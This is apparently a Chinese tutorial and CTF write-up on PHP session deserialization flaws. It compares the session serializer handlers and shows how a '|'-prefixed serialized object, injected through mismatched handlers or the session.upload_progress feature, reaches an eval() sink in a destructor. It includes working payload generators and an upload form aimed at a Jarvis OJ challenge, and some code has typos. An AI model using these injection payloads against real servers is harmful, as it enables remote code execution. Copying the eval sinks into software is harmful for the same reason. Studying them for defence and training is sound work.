前言
PHP中的Session保存
php.ini有以下配置项用于控制session有关的设置
session.save_path=”D:xampp\tmp”表明所有的session文件都是存储在xampp/tmp下
session.save_handler=files表明session是以文件的方式来进行存储的
session.auto_start=0表明默认不启动session
session.serialize handler=php表明session的默认序列话引擎使用的是php序列话引擎
php_seralize序列化引擎
session.php
<?php
ini_set("session.serialize_handler","php_seralize");
session_start();
$_SESSION["name"] = $_GET["a"];
?>
我本地的session存储路径是在这里D:\phpstudy\PHPTutorial\tmp\tmp
传递http://127.0.0.1/session.php?a=purplet,再查看发现就是一个普通的序列化结果。
php序列化引擎
session.php
<?php
ini_set("session.serialize_handler","php");
session_start();
$_SESSION["name"] = $_GET["a"];
?>
传递http://127.0.0.1/session.php?a=purplet,查看发现序列化的内容与上述不同了.
php_binary序列化引擎
session.php
<?php
ini_set("session.serialize_handler","php_binary");
session_start();
$_SESSION["name"] = $_GET["a"];
?>
传递http://127.0.0.1/session.php?a=purplet,序列化内容如下:
小结
php:
name|s:7:”purplet”;
存储方式是,键名+竖线+经过serialize()函数序列处理的值
php binary
names:7:”purplet”;
存储方式是,键名的长度对应的ASClI字符+键名+经过serialize()函数序列化处理的值
php_serialize(php>5.5.4)
a:1:{s:4:”name”;s:7:”purplet”}
存储方式是,经过serialize)函数序列化处理的值
引擎不同导致的问题
test1.php
<?php
ini_set("session.serialize_handler","php_binary");
session_start();
$_SESSION["spoock"] = $_GET["a"];
?>
test2.php
<?php
ini_set('session.serialize_handler','php');
session_start();
cLass lemon{
var $hi;
function construct(){
$this->hi='phpinfo();';
}
function destruct(){
eval($this->hi);
}
}
?>
exp.php
<?php
cLass lemon{
var $hi;
function __construct(){
$this->hi='phpinfo();';
}
function __destruct(){
eval($this->hi);
}
}
$a = new lemon();
$a -> hi ="echo 'HelloWorld';";
echo serialize($a);
?>
结果为:O:5:”lemon”:1:{s:2:”hi”;s:18:”echo ‘HelloWorld’;”;}
那么我们想要让访问test2.php时输出HelloWorld该怎么办呢,首先不同引擎对内容序列化的方法我们知道了,而反序列化的时候也同上面小结所写一样。
所以我们在test1.php处传递?a=|O:5:”lemon”:1:{s:2:”hi”;s:18:”echo ‘HelloWorld’;”;}
php_serialize引擎存储,php引擎提取,执行反序列化方法:在php引擎构造的exp出的Payload前多加一个| 即可
从生成的序列化结果中我们也能看除,|前的会被当做键名,而之后的则就会被反序列化回去,所以访问test2.php时即可看到输出了HelloWord
但是这种利用方式很少见,因为程序员的编写也很少会将序列化引擎写成两种。那么还有没有更好利用的session反序列化方法呢?
Sessioin反序列化的特殊利用
当PHP中session.upload_progress.enabled打开时,php会记录上传文件的进度,在上传时会将其信息保存在$_SESSION中。
php.ini中这两项的前面;去掉
session.upload_progress.enabled = On(是否启用上传进度报告)
session.upload_progress.cleanup = Off(是否上传完之后删除session文件)
上传文件进度的报告就会以写入到session文件中,所以我们可以设置一个与session.upload_progress.name同名的变量(默认名为PHP_SESSION_UPLOAD_PROGRESS),PHP检测到这种同名请求会在$_SESSION中添加一条数据。我们就可以控制这个数据内容为我们的恶意payload。
例题http://web.jarvisoj.com:32784/
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
public $mdzz;
function __construct()
{
$this->mdzz = 'phpinfo();';
}
function __destruct()
{
eval($this->mdzz);
}
}
if(isset($_GET['phpinfo']))
{
$m = new OowoO();
}
else
{
highlight_string(file_get_contents('index.php'));
}
?>
传递?phpinfo,在输出的phpinfo信息中发现这两个参数符合上面所说的要求
构造一个上传表单
<html>
<body>
<form action="http://web.jarvisoj.com:32784/index.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123"/>
<input type="file" name="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
构造反序列化代码:
<?php
class OowoO
{
public $mdzz;
}
$a = new OowoO();
$a->mdzz="print_r(scandir(__dir__));";
echo serialize($a);
?>
结果:O:5:”OowoO”:1:{s:4:”mdzz”;s:26:”print_r(scandir(__dir__));”;}
然后用构造的表单上传任意文件抓包,修改序列化内容满足php引擎的处理方式,在前面加个|
成功列出当前目录
